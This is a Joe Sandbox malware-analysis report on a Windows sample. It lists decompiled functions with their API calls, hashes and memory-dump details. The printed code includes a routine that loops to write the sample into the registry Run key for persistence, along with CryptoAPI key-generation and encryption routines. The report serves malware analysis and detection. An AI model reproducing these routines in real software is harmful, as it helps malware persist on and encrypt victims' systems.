                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				long _t21;
                                                                                                                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                                                                                                                        				char* _t26;
                                                                                                                                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                                                                                                                                        				char* _t32;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                                                                                                        				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                                        				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                                        					_v24 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v20 = 3;
                                                                                                                                                                                                                                                                                                        					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                                        					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                                                        					_v28 = _t24;
                                                                                                                                                                                                                                                                                                        					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                                                                                                                                        						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                                        						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x04006cf6
                                                                                                                                                                                                                                                                                                        0x04006cfa
                                                                                                                                                                                                                                                                                                        0x04006d0a
                                                                                                                                                                                                                                                                                                        0x04006d0c
                                                                                                                                                                                                                                                                                                        0x04006d0c
                                                                                                                                                                                                                                                                                                        0x04006d13
                                                                                                                                                                                                                                                                                                        0x04006d25
                                                                                                                                                                                                                                                                                                        0x04006d30
                                                                                                                                                                                                                                                                                                        0x04006d38
                                                                                                                                                                                                                                                                                                        0x04006d3a
                                                                                                                                                                                                                                                                                                        0x04006d41
                                                                                                                                                                                                                                                                                                        0x04006d56
                                                                                                                                                                                                                                                                                                        0x04006d61
                                                                                                                                                                                                                                                                                                        0x04006d67
                                                                                                                                                                                                                                                                                                        0x04006d6e
                                                                                                                                                                                                                                                                                                        0x04006d70
                                                                                                                                                                                                                                                                                                        0x04006d74
                                                                                                                                                                                                                                                                                                        0x04006d7e
                                                                                                                                                                                                                                                                                                        0x04006d7e
                                                                                                                                                                                                                                                                                                        0x04006d88
                                                                                                                                                                                                                                                                                                        0x04006d88
                                                                                                                                                                                                                                                                                                        0x04006d94

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                                        • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v56;
                                                                                                                                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v16 = _t79;
                                                                                                                                                                                                                                                                                                        					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t80;
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v24 = 0x1000;
                                                                                                                                                                                                                                                                                                        						_v20 = 0x1000;
                                                                                                                                                                                                                                                                                                        						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                                                        						if(_t85 != 0) {
                                                                                                                                                                                                                                                                                                        							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                                                        							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                                                        							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                                                        							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                                                        								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                                                        								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                                                        								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        								_v32 = _t90;
                                                                                                                                                                                                                                                                                                        								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        									_v44 = _a8;
                                                                                                                                                                                                                                                                                                        									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                                                        									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                                                        									if(_t94 != 0) {
                                                                                                                                                                                                                                                                                                        										_v48 = _a12;
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                                                        										_v60 = 0;
                                                                                                                                                                                                                                                                                                        										_v56 = _v48;
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                                                        										_v52 = _v48;
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                                                        										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                                                        										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                                                        										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                                                        										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x04008376
                                                                                                                                                                                                                                                                                                        0x04008381
                                                                                                                                                                                                                                                                                                        0x040085c0
                                                                                                                                                                                                                                                                                                        0x040085c6
                                                                                                                                                                                                                                                                                                        0x040083b1
                                                                                                                                                                                                                                                                                                        0x040083bf
                                                                                                                                                                                                                                                                                                        0x040083c5
                                                                                                                                                                                                                                                                                                        0x040083d6
                                                                                                                                                                                                                                                                                                        0x040083dc
                                                                                                                                                                                                                                                                                                        0x040083e3
                                                                                                                                                                                                                                                                                                        0x040083f3
                                                                                                                                                                                                                                                                                                        0x040083fa
                                                                                                                                                                                                                                                                                                        0x0400841b
                                                                                                                                                                                                                                                                                                        0x04008425
                                                                                                                                                                                                                                                                                                        0x04008431
                                                                                                                                                                                                                                                                                                        0x04008435
                                                                                                                                                                                                                                                                                                        0x0400843b
                                                                                                                                                                                                                                                                                                        0x0400843e
                                                                                                                                                                                                                                                                                                        0x0400844e
                                                                                                                                                                                                                                                                                                        0x0400845b
                                                                                                                                                                                                                                                                                                        0x0400846b
                                                                                                                                                                                                                                                                                                        0x04008471
                                                                                                                                                                                                                                                                                                        0x04008478
                                                                                                                                                                                                                                                                                                        0x04008481
                                                                                                                                                                                                                                                                                                        0x04008490
                                                                                                                                                                                                                                                                                                        0x040084a8
                                                                                                                                                                                                                                                                                                        0x040084b2
                                                                                                                                                                                                                                                                                                        0x040084bb
                                                                                                                                                                                                                                                                                                        0x040084c8
                                                                                                                                                                                                                                                                                                        0x040084da
                                                                                                                                                                                                                                                                                                        0x040084e2
                                                                                                                                                                                                                                                                                                        0x040084ec
                                                                                                                                                                                                                                                                                                        0x040084f9
                                                                                                                                                                                                                                                                                                        0x04008504
                                                                                                                                                                                                                                                                                                        0x04008511
                                                                                                                                                                                                                                                                                                        0x04008525
                                                                                                                                                                                                                                                                                                        0x0400853c
                                                                                                                                                                                                                                                                                                        0x04008550
                                                                                                                                                                                                                                                                                                        0x04008576
                                                                                                                                                                                                                                                                                                        0x0400857e
                                                                                                                                                                                                                                                                                                        0x0400857e
                                                                                                                                                                                                                                                                                                        0x0400858c
                                                                                                                                                                                                                                                                                                        0x0400858c
                                                                                                                                                                                                                                                                                                        0x04008478
                                                                                                                                                                                                                                                                                                        0x0400843e
                                                                                                                                                                                                                                                                                                        0x04008425
                                                                                                                                                                                                                                                                                                        0x04008596
                                                                                                                                                                                                                                                                                                        0x040085a3
                                                                                                                                                                                                                                                                                                        0x040085a3
                                                                                                                                                                                                                                                                                                        0x040085ad
                                                                                                                                                                                                                                                                                                        0x040085ba
                                                                                                                                                                                                                                                                                                        0x040085ba
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040085ad

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 487564122-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                                        • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				CHAR* _v8;
                                                                                                                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                                                                                                                        				CHAR* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = _v8;
                                                                                                                                                                                                                                                                                                        					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                                        					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                                                        						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                                        							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                                        							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                                                        							RegCloseKey(_v24);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x040012d9
                                                                                                                                                                                                                                                                                                        0x040012e0
                                                                                                                                                                                                                                                                                                        0x040012e9
                                                                                                                                                                                                                                                                                                        0x040012ec
                                                                                                                                                                                                                                                                                                        0x040012f3
                                                                                                                                                                                                                                                                                                        0x04001301
                                                                                                                                                                                                                                                                                                        0x04001314
                                                                                                                                                                                                                                                                                                        0x04001316
                                                                                                                                                                                                                                                                                                        0x04001316
                                                                                                                                                                                                                                                                                                        0x0400131d
                                                                                                                                                                                                                                                                                                        0x04001337
                                                                                                                                                                                                                                                                                                        0x0400133f
                                                                                                                                                                                                                                                                                                        0x0400134b
                                                                                                                                                                                                                                                                                                        0x04001368
                                                                                                                                                                                                                                                                                                        0x04001372
                                                                                                                                                                                                                                                                                                        0x04001372
                                                                                                                                                                                                                                                                                                        0x0400137d
                                                                                                                                                                                                                                                                                                        0x0400137d
                                                                                                                                                                                                                                                                                                        0x040012fc
                                                                                                                                                                                                                                                                                                        0x0400138d

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNEL32(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtualmemcpy
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 4237922067-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6571a1a19d4867cb41af07d93aa71d0a9a5c92769b2966b0a7b26dbabfc254cc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A015EB5A05205AFDB10EFA9D58459EFBF1EF88354F50882AF998E7350D334A8448B46
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                                                        • Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                                                                                                                                                        			E00412210() {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                                                                                                        				char** _t62;
                                                                                                                                                                                                                                                                                                        				signed int* _t65;
